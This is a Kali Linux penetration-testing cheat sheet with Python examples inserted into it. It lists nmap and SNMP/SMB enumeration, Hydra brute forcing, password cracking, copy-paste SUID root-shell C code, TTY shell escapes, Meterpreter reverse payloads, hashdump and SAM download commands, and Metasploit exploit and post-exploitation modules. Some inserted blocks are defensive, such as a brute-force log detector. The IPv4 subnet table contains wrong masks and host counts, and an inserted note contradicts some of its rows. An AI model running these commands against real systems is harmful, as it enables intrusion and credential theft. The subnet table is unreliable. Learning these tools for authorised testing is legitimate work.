Penetration testing (also called pen testing) is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit.
Kali Linux Cheat Sheet for Penetration testers is a high level overview for typical penetration testing environments ranging from nmap, sqlmap, ipv4, enumeration, fingerprinting etc. Always view man pages if you are in doubt or the commands are not working as outlined here (can be OS based, version based changes etc.) for the operating system you are using (such as BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu etc.). I’ve also referenced some guides that I found useful in different sections and they might come in handy.
Recon and Enumeration
NMAP Commands
Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.
| Command | Description |
|---|---|
| nmap -v -sS -A -T4 target | Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services |
| nmap -v -sS -p- -A -T4 target | As above but scans all TCP ports (takes a lot longer) |
| nmap -v -sU -sS -p- -A -T4 target | As above but scans all TCP ports and UDP scan (takes even longer) |
| nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X | Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover |
| ls /usr/share/nmap/scripts/* \| grep ftp | Search nmap scripts for keywords |
Router hack using nmap here.
SMB enumeration
In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.
| Command | Description |
|---|---|
| nbtscan 192.168.1.0/24 | Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain |
| enum4linux -a target-ip | Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing |
Other Host Discovery
Other methods of host discovery that don’t use nmap…
| Command | Description |
|---|---|
| netdiscover -r 192.168.1.0/24 | Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site |
Python Local Web Server
Python local web server command, handy for serving up shells and exploits on an attacking machine.
| Command | Description |
|---|---|
| python -m SimpleHTTPServer 80 | Run a basic http server, great for serving up shells etc |
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
| Command | Description |
|---|---|
| mount 192.168.1.1:/vol/share /mnt/nfs | Mount NFS share to /mnt/nfs |
| mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs | Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove password it will prompt on the CLI (more secure as it won’t end up in bash_history) |
| net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no | Mount a Windows share on Windows from the command line |
| apt-get install smb4k -y | Install smb4k on Kali, useful Linux GUI for browsing SMB shares |
Basic FingerPrinting
A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
| Command | Description |
|---|---|
| nc -v 192.168.1.1 25 | Basic versioning / fingerprinting via displayed banner |
| telnet 192.168.1.1 25 | Basic versioning / fingerprinting via displayed banner |
SNMP Enumeration
SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.
| Command | Description |
|---|---|
| snmpcheck -t 192.168.1.X -c public | SNMP enumeration |
| snmpwalk -c public -v1 192.168.1.X 1 | SNMP enumeration |
| snmpenum -t 192.168.1.X | SNMP enumeration |
| onesixtyone -c names -i hosts | SNMP enumeration |
DNS Zone Transfers
| Command | Description |
|---|---|
| nslookup -> set type=any -> ls -d blah.com | Windows DNS zone transfer |
| dig axfr blah.com @ns1.blah.com | Linux DNS zone transfer |
DNSRecon
DNSRecon provides the ability to perform:
- Check all NS Records for Zone Transfers
- Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
- Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
- Check for Wildcard Resolution
- Brute Force subdomain and host A and AAAA records given a domain and a wordlist
- Perform a PTR Record lookup for a given IP Range or CIDR
- Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
- Enumerate Common mDNS records in the Local Network
- Enumerate Hosts and Subdomains using Google
DNS Enumeration Kali - DNSRecon
| Command | Description |
|---|---|
| dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml | DNSRecon standard enumeration of TARGET with a brute force wordlist, results written to output.xml |
HTTP / HTTPS Webserver Enumeration
| Command | Description |
|---|---|
| nikto -h 192.168.1.1 | Perform a nikto scan against target |
| dirbuster | Configure via GUI, CLI input doesn’t work most of the time |
Packet Inspection
| Command | Description |
|---|---|
| tcpdump tcp port 80 -w output.pcap -i eth0 | tcpdump for port 80 on interface eth0, outputs to output.pcap |
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
| Command | Description |
|---|---|
| python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX | Enumerate users from SMB |
| ridenum.py 192.168.XXX.XXX 500 50000 dict.txt | RID cycle SMB / enumerate users from SMB |
SNMP User Enumeration
| Command | Description |
|---|---|
| snmpwalk -c public -v1 192.168.X.XXX 1 \| grep 77.1.2.25 \| cut -d" " -f4 | Enumerate users from SNMP |
| python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX | Enumerate users from SNMP |
| nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) | Search for SNMP servers with nmap, grepable output |
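The last row leaves the "then grep" step to the reader. As an added example that is not part of the original cheat sheet, the Python below parses nmap's greppable (`-oG`) output and lists the hosts on which a given port is in a given state, which is the same question the grep answers but without mis-matching on the `Ignored State` field or on `open|filtered` UDP results. `SAMPLE_GNMAP` is a constructed sample in the `-oG` format, not output from a real scan.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in nmap's greppable (-oG) format; not output from a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.91 scan initiated (constructed sample)
Host: 192.168.1.10 (printer.lan)\tStatus: Up
Host: 192.168.1.10 (printer.lan)\tPorts: 161/open/udp//snmp///, 80/open/tcp//http///\tIgnored State: closed (998)
Host: 192.168.1.11 ()\tStatus: Up
Host: 192.168.1.11 ()\tPorts: 161/closed/udp//snmp///, 22/open/tcp//ssh///
Host: 192.168.1.12 (switch.lan)\tPorts: 161/open|filtered/udp//snmp///
# Nmap done (constructed sample) -- 3 IP addresses (3 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")

PortEntry = Tuple[int, str, str, str]  # (port, state, protocol, service)


def parse_gnmap(text: str) -> Dict[str, List[PortEntry]]:
    """Return {ip: [(port, state, proto, service), ...]} from -oG output."""
    hosts: Dict[str, List[PortEntry]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '#' comment lines
        ip = m.group(1)
        hosts.setdefault(ip, [])
        # Fields after the host are tab-separated: Status, Ports, Ignored State, ...
        for field in line.split("\t")[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # Each entry is port/state/protocol/owner/service/rpc/version/
                parts = entry.split("/")
                hosts[ip].append((int(parts[0]), parts[1], parts[2], parts[4]))
    return hosts


def hosts_with_port(hosts: Dict[str, List[PortEntry]], port: int,
                    proto: Optional[str] = None, states=("open",)) -> List[str]:
    """IPs that have `port` in one of `states` (optionally restricted to a protocol)."""
    return sorted(
        ip for ip, entries in hosts.items()
        if any(p == port and s in states and (proto is None or pr == proto)
               for p, s, pr, _ in entries)
    )


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    print("SNMP open:", hosts_with_port(scan, 161, proto="udp"))
    print("SNMP open or open|filtered:",
          hosts_with_port(scan, 161, states=("open", "open|filtered")))
```

Pass `states=("open", "open|filtered")` when reviewing UDP results, since nmap reports most unanswered UDP probes that way.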
Passwords
Wordlists
| Command | Description |
|---|---|
| /usr/share/wordlists | Kali word lists |
Massive wordlist here at g0tm1lk’s blog
Brute Forcing Services
Hydra FTP Brute Force
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is pre-installed.
| Command | Description |
|---|---|
| hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V | Hydra FTP brute force |
Hydra POP3 Brute Force
| Command | Description |
|---|---|
| hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V | Hydra POP3 brute force |
Hydra SMTP Brute Force
| Command | Description |
|---|---|
| hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V | Hydra SMTP brute force |
Use -t to limit concurrent connections, example: -t 15
Cracking passwords using Hydra: guide here
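Seen from the service being tested, a Hydra run like the ones above is a burst of failed logins from one client in a few seconds. As an added example that is not part of the original cheat sheet, the Python below groups failures per client IP in a sliding time window, flags bursts, records which usernames were tried (one user means password guessing, many means spraying) and notes whether a successful login followed the burst. `SAMPLE_LOG` is a constructed sample written in the style of vsftpd's log lines, not a real log.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample modelled on vsftpd's log line style; not a real log.
SAMPLE_LOG = """\
Mon Jan 10 10:00:01 2022 [pid 1201] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan 10 10:00:02 2022 [pid 1202] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan 10 10:00:02 2022 [pid 1203] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan 10 10:00:03 2022 [pid 1204] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan 10 10:00:04 2022 [pid 1205] [admin] FAIL LOGIN: Client "203.0.113.7"
Mon Jan 10 10:00:09 2022 [pid 1206] [admin] OK LOGIN: Client "203.0.113.7"
Mon Jan 10 10:05:00 2022 [pid 1300] [alice] FAIL LOGIN: Client "198.51.100.4"
Mon Jan 10 10:45:00 2022 [pid 1301] [alice] FAIL LOGIN: Client "198.51.100.4"
Mon Jan 10 10:45:10 2022 [pid 1302] [alice] OK LOGIN: Client "198.51.100.4"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[^"]+)"'
)

Event = Tuple[datetime, str, str, str]  # (time, client ip, user, FAIL|OK)


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # lines in another format are ignored
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 5,
                      window_s: int = 60) -> Dict[str, dict]:
    """Flag client IPs with >= threshold failed logins inside any window_s-second span."""
    fails: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    oks: Dict[str, List[datetime]] = defaultdict(list)
    for ts, ip, user, result in events:
        if result == "FAIL":
            fails[ip].append((ts, user))
        else:
            oks[ip].append(ts)

    alerts: Dict[str, dict] = {}
    for ip, attempts in fails.items():
        attempts.sort()
        for i in range(len(attempts)):
            # Extend the window from attempt i as far as window_s allows.
            j = i
            while (j + 1 < len(attempts)
                   and (attempts[j + 1][0] - attempts[i][0]).total_seconds() <= window_s):
                j += 1
            if j - i + 1 >= threshold:
                burst_end = attempts[j][0]
                alerts[ip] = {
                    "failures": j - i + 1,
                    "users": sorted({u for _, u in attempts[i:j + 1]}),
                    # a success right after the burst suggests a guessed credential
                    "success_after": any(t >= burst_end for t in oks[ip]),
                }
                break  # one alert per IP is enough for triage
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

With the defaults only 203.0.113.7 is flagged (five failures in three seconds, then a success); the two failures from 198.51.100.4 forty minutes apart are ordinary typos. Note that `-t` in Hydra only throttles concurrency, so a slower run still produces the same per-IP failure count over a longer window.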
Password Cracking
John The Ripper – JTR
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like an ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Nowadays hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. The larger the database, the more words are covered.
| Command | Description |
|---|---|
| john --wordlist=/usr/share/wordlists/rockyou.txt hashes | JTR password cracking |
| john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt | JTR forced descrypt cracking with wordlist |
| john --format=descrypt hash --show | JTR forced descrypt brute force cracking |
Cracking passwords using John the Ripper: guide here
Exploit Research
Ways to find exploits for enumerated hosts / services.
| Command | Description |
|---|---|
| searchsploit windows 2003 \| grep -i local | Search exploit-db for exploit, in this example windows 2003 + local esc |
| site:exploit-db.com exploit kernel <= 3 | Use google to search exploit-db.com for exploits |
| grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* | Search metasploit modules using grep – msf search sucks a bit |
Full on guide with screenshots for searching exploits here
Compiling Exploits
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
| Command | Description |
|---|---|
| process.h, string.h, winbase.h, windows.h, winsock2.h | Windows exploit code |
| arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h | Linux exploit code |
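As an added example that is not part of the original cheat sheet, the Python below applies the table above to a C file: it collects the `#include` lines and reports whether the headers point at Windows, Linux, both (a portable source with `#ifdef _WIN32` blocks) or neither. `string.h` is standard C and appears in code for either platform, so the script gives it no weight. The three snippets are constructed, hypothetical inputs, not real exploit code.

```python
import re
from typing import Dict, Set

# Header names used as OS indicators, from the table above. <string.h> is standard C
# and shows up in code for both platforms, so it is left out of the scoring.
WINDOWS_HEADERS: Set[str] = {"process.h", "winbase.h", "windows.h", "winsock2.h"}
LINUX_HEADERS: Set[str] = {"arpa/inet.h", "fcntl.h", "netdb.h", "netinet/in.h",
                           "sys/socket.h", "sys/types.h", "unistd.h"}

INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]', re.MULTILINE)


def classify_exploit_source(src: str) -> Dict[str, object]:
    """Guess the build platform of a C file from its #include lines."""
    headers = set(INCLUDE_RE.findall(src))
    win, nix = headers & WINDOWS_HEADERS, headers & LINUX_HEADERS
    if win and not nix:
        platform = "windows"
    elif nix and not win:
        platform = "linux"
    elif win and nix:
        platform = "mixed"      # e.g. #ifdef _WIN32 blocks covering both targets
    else:
        platform = "unknown"    # only portable headers such as stdio.h
    return {"platform": platform,
            "windows_headers": sorted(win),
            "linux_headers": sorted(nix)}


# Constructed snippets (hypothetical, not real exploit code) used as input.
WINSOCK_SNIPPET = """
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
int main(void) { WSADATA w; WSAStartup(MAKEWORD(2, 2), &w); return 0; }
"""

BSD_SOCKET_SNIPPET = """
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
int main(void) { int s = socket(AF_INET, SOCK_STREAM, 0); close(s); return 0; }
"""

PORTABLE_SNIPPET = "#include <stdio.h>\n#include <string.h>\nint main(void){return 0;}\n"


if __name__ == "__main__":
    for name, code in [("winsock", WINSOCK_SNIPPET), ("bsd", BSD_SOCKET_SNIPPET),
                       ("portable", PORTABLE_SNIPPET)]:
        print(name, "->", classify_exploit_source(code)["platform"])
```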
Build Exploit GCC
Compile an exploit with gcc.
| Command | Description |
|---|---|
| gcc -o exploit exploit.c | Basic GCC compile |
GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
| Command | Description |
|---|---|
| gcc -m32 exploit.c -o exploit | Cross compile 32 bit binary on 64 bit Linux |
Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting in a .exe file.
| Command | Description |
|---|---|
| i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe | Compile windows .exe on Linux |
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.
Below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bash
```c
#define _GNU_SOURCE        /* glibc only declares setresuid() with this defined */
#include <stdlib.h>
#include <unistd.h>
int main(void){
setresuid(0, 0, 0);        /* real, effective and saved UID all set to root */
system("/bin/bash");
}
```
SUID C Shell for /bin/sh
```c
#define _GNU_SOURCE        /* glibc only declares setresuid() with this defined */
#include <stdlib.h>
#include <unistd.h>
int main(void){
setresuid(0, 0, 0);        /* real, effective and saved UID all set to root */
system("/bin/sh");
}
```
Building the SUID Shell binary
```
gcc -o suid suid.c
```
For 32 bit:
```
gcc -m32 -o suid suid.c
```
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.
Python TTY Shell Trick
```
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
```
Spawn Interactive sh shell
```
/bin/sh -i
```
Spawn Perl TTY Shell
```
exec "/bin/sh";
perl -e 'exec "/bin/sh";'
```
Spawn Ruby TTY Shell
```
exec "/bin/sh"
```
Spawn Lua TTY Shell
```
os.execute('/bin/sh')
```
Spawn TTY Shell from Vi
Run shell commands from vi:
```
:!bash
```
Spawn TTY Shell NMAP
```
!sh
```
Metasploit
Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.
Metasploit’s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.
Meterpreter Payloads
Windows reverse meterpreter payload
| Command | Description |
|---|---|
| set payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload |
Windows VNC Meterpreter payload
| Command | Description |
|---|---|
| set payload windows/vncinject/reverse_tcp | Meterpreter Windows VNC Payload |
| set ViewOnly false | Allow interaction with the VNC session instead of view only |
Linux Reverse Meterpreter payload
| Command | Description |
|---|---|
| set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Meterpreter Cheat Sheet
Useful meterpreter commands.
| Command | Description |
|---|---|
| upload file c:\\windows | Meterpreter upload file to Windows target |
| download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
| execute -f c:\\windows\\temp\\exploit.exe | Meterpreter run .exe on target – handy for executing uploaded exploits |
| execute -f cmd -c | Creates new channel with cmd shell |
| ps | Meterpreter show processes |
| shell | Meterpreter get shell on the target |
| getsystem | Meterpreter attempts privilege escalation on the target |
| hashdump | Meterpreter attempts to dump the hashes on the target |
| portfwd add -l 3389 -p 3389 -r target | Meterpreter create port forward to target machine |
| portfwd delete -l 3389 -p 3389 -r target | Meterpreter delete port forward |
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
| Command | Description |
|---|---|
| use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
| use exploit/windows/dcerpc/ms06_040_netapi | MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit |
| use exploit/windows/smb/ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
Local Windows Metasploit Modules (exploits)
| Command | Description |
|---|---|
| use exploit/windows/local/bypassuac | Bypass UAC on Windows 7 + Set target + arch, x86/64 |
Auxiliary Metasploit Modules
| Command | Description |
|---|---|
| use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner |
| use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner |
| use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
| use auxiliary/scanner/mysql/mysql_version | Metasploit MySQL Version Scanner |
| use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Metasploit Powershell Modules
| Command | Description |
|---|---|
| use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module |
| post/windows/manage/powershell/exec_powershell | Metasploit upload and run powershell script through a session |
| use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
| use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
| Command | Description |
|---|---|
| run post/windows/gather/win_privs | Metasploit show privileges of current user |
| use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords |
| load mimikatz -> wdigest | Metasploit load Mimikatz |
| run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to |
Networking
TTL Fingerprinting
| Operating System | TTL Size |
|---|---|
| Windows | 128 |
| Linux | 64 |
| Solaris | 255 |
| Cisco / Network | 255 |
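The table gives the initial TTL each OS family sets; a packet that arrives with TTL 118 was most likely sent with 128 and crossed 10 routers. As an added example that is not part of the original cheat sheet, the Python below turns an observed TTL into an OS guess plus hop estimate (the guess is the smallest default that is at least the observed value) and applies it to `tcpdump -v` style lines to fingerprint traffic sources passively. Caveat built into the code: a Windows host more than 64 hops away, or any host with a tuned TTL, will be misclassified, so treat the result as a hint, not proof. `SAMPLE_CAPTURE` is constructed in the style of `tcpdump -v -n` output with header and flow joined on one line, not a real capture.

```python
import re
from typing import Dict, Iterable, Tuple

# Default initial TTLs from the table above. The guess picks the smallest default
# that is >= the observed TTL; the difference estimates the number of hops.
DEFAULT_TTLS: Dict[int, str] = {
    64: "Linux / Unix",
    128: "Windows",
    255: "Solaris / Cisco / network device",
}

# "ttl <n>" from the IP header, then the first "a.b.c.d.port >" which is the source.
TTL_RE = re.compile(r"\bttl (\d+)\b.*?\s(\d+\.\d+\.\d+\.\d+)\.\d+ >")


def guess_os_from_ttl(observed: int) -> Tuple[str, int]:
    """Return (os guess, estimated hops) for a TTL seen in a received packet."""
    if not 0 < observed <= 255:
        raise ValueError(f"TTL out of range: {observed}")
    for default in sorted(DEFAULT_TTLS):
        if observed <= default:
            # A host whose default is higher but which is far away (>64 hops) would
            # be mis-assigned here; that ambiguity is inherent to the method.
            return DEFAULT_TTLS[default], default - observed
    raise AssertionError("unreachable: 255 covers every valid TTL")


def fingerprint_capture(lines: Iterable[str]) -> Dict[str, Tuple[str, int]]:
    """Map source IP -> (os guess, hops) from tcpdump -v style lines."""
    result: Dict[str, Tuple[str, int]] = {}
    for line in lines:
        m = TTL_RE.search(line)
        if m:
            ttl, src = int(m.group(1)), m.group(2)
            result.setdefault(src, guess_os_from_ttl(ttl))  # keep the first sighting
    return result


# Constructed lines in the style of `tcpdump -v -n`; not a real capture.
SAMPLE_CAPTURE = [
    "IP (tos 0x0, ttl 118, id 4711, offset 0, flags [DF], proto TCP (6), length 60) "
    "203.0.113.7.445 > 192.0.2.5.51234: Flags [S.]",
    "IP (tos 0x0, ttl 54, id 815, offset 0, flags [DF], proto TCP (6), length 60) "
    "198.51.100.4.22 > 192.0.2.5.51235: Flags [S.]",
    "IP (tos 0x0, ttl 250, id 9, offset 0, flags [none], proto TCP (6), length 44) "
    "192.0.2.1.23 > 192.0.2.5.51236: Flags [S.]",
]


if __name__ == "__main__":
    for src, (os_guess, hops) in fingerprint_capture(SAMPLE_CAPTURE).items():
        print(f"{src:15} {os_guess:35} ~{hops} hops away")
```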
IPv4
Classful IP Ranges
E.g. Class A, B, C (deprecated)
| Class | IP Address Range |
|---|---|
| Class A IP Address Range | 0.0.0.0 – 127.255.255.255 |
| Class B IP Address Range | 128.0.0.0 – 191.255.255.255 |
| Class C IP Address Range | 192.0.0.0 – 223.255.255.255 |
| Class D IP Address Range | 224.0.0.0 – 239.255.255.255 |
| Class E IP Address Range | 240.0.0.0 – 255.255.255.255 |
IPv4 Private Address Ranges
| Class | Range |
|---|---|
| Class A Private Address Range | 10.0.0.0 – 10.255.255.255 |
| Class B Private Address Range | 172.16.0.0 – 172.31.255.255 |
| Class C Private Address Range | 192.168.0.0 – 192.168.255.255 |
| Loopback Address Range | 127.0.0.0 – 127.255.255.255 |
IPv4 Subnet Cheat Sheet
| CIDR | Decimal Mask | Number of Hosts |
|---|---|---|
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.249 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 512 Host |
| /22 | 255.255.252.0 | 1022 Hosts |
| /21 | 255.255.248.0 | 2046 Hosts |
| /20 | 255.255.240.0 | 4094 Hosts |
| /19 | 255.255.224.0 | 8190 Hosts |
| /18 | 255.255.192.0 | 16382 Hosts |
| /17 | 255.255.128.0 | 32766 Hosts |
| /16 | 255.255.0.0 | 65534 Hosts |
| /15 | 255.254.0.0 | 131070 Hosts |
| /14 | 255.252.0.0 | 262142 Hosts |
| /13 | 255.248.0.0 | 524286 Hosts |
| /12 | 255.240.0.0 | 1048674 Hosts |
| /11 | 255.224.0.0 | 2097150 Hosts |
| /10 | 255.192.0.0 | 4194302 Hosts |
| /9 | 255.128.0.0 | 8388606 Hosts |
| /8 | 255.0.0.0 | 16777214 Hosts |
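The three IPv4 tables above are all derived from the address bits, so they can be regenerated rather than memorised. As an added example that is not part of the original cheat sheet, the Python below classifies an address by classful range and by scope (loopback, RFC 1918 private, public) using only the standard `ipaddress` module, and computes the dotted mask and usable host count for any prefix length. It follows RFC 3021 in giving /31 two usable addresses, and it is a quick way to recheck any row of the subnet table (for instance it gives 255.255.255.248 for /29 and 510 hosts for /23).

```python
import ipaddress
from typing import List, Tuple

PRIVATE_RANGES = [ipaddress.ip_network(n)
                  for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOOPBACK_RANGE = ipaddress.ip_network("127.0.0.0/8")


def ipv4_class(addr: str) -> str:
    """Historical classful class A-E, decided by the first octet as in the table above."""
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    if first_octet < 128:
        return "A"
    if first_octet < 192:
        return "B"
    if first_octet < 224:
        return "C"
    if first_octet < 240:
        return "D"
    return "E"


def address_scope(addr: str) -> str:
    """'loopback', 'private' (RFC 1918) or 'public'."""
    ip = ipaddress.IPv4Address(addr)
    if ip in LOOPBACK_RANGE:
        return "loopback"
    if any(ip in net for net in PRIVATE_RANGES):
        return "private"
    return "public"


def cidr_info(prefix: int) -> Tuple[str, int]:
    """(dotted decimal mask, usable host addresses) for a /prefix network."""
    if not 0 <= prefix <= 32:
        raise ValueError(f"bad prefix length: {prefix}")
    net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
    if prefix == 32:
        usable = 1                        # a single host route
    elif prefix == 31:
        usable = 2                        # RFC 3021 point-to-point link
    else:
        usable = net.num_addresses - 2    # minus network and broadcast addresses
    return str(net.netmask), usable


def subnet_table(smallest: int = 31, largest: int = 8) -> List[Tuple[int, str, int]]:
    """Rows (prefix, mask, hosts) from /smallest down to /largest, like the cheat sheet."""
    return [(p, *cidr_info(p)) for p in range(smallest, largest - 1, -1)]


if __name__ == "__main__":
    for prefix, mask, hosts in subnet_table():
        print(f"/{prefix:<3} {mask:<17} {hosts} hosts")
    for a in ("10.1.2.3", "172.31.0.9", "172.32.0.1", "127.0.0.1", "224.0.0.251"):
        print(a, ipv4_class(a), address_scope(a))
```

Note that 172.32.0.1 is a class B address but is public: the private block is 172.16.0.0/12, which stops at 172.31.255.255.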
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
| ASCII | Character |
|---|---|
| x00 | Null Byte |
| x08 | BS |
| x09 | TAB |
| x0a | LF |
| x0d | CR |
| x1b | ESC |
| x20 | SPC |
| x21 | ! |
| x22 | " |
| x23 | # |
| x24 | $ |
| x25 | % |
| x26 | & |
| x27 | ' |
| x28 | ( |
| x29 | ) |
| x2a | * |
| x2b | + |
| x2c | , |
| x2d | - |
| x2e | . |
| x2f | / |
| x30 | 0 |
| x31 | 1 |
| x32 | 2 |
| x33 | 3 |
| x34 | 4 |
| x35 | 5 |
| x36 | 6 |
| x37 | 7 |
| x38 | 8 |
| x39 | 9 |
| x3a | : |
| x3b | ; |
| x3c | < |
| x3d | = |
| x3e | > |
| x3f | ? |
| x40 | @ |
| x41 | A |
| x42 | B |
| x43 | C |
| x44 | D |
| x45 | E |
| x46 | F |
| x47 | G |
| x48 | H |
| x49 | I |
| x4a | J |
| x4b | K |
| x4c | L |
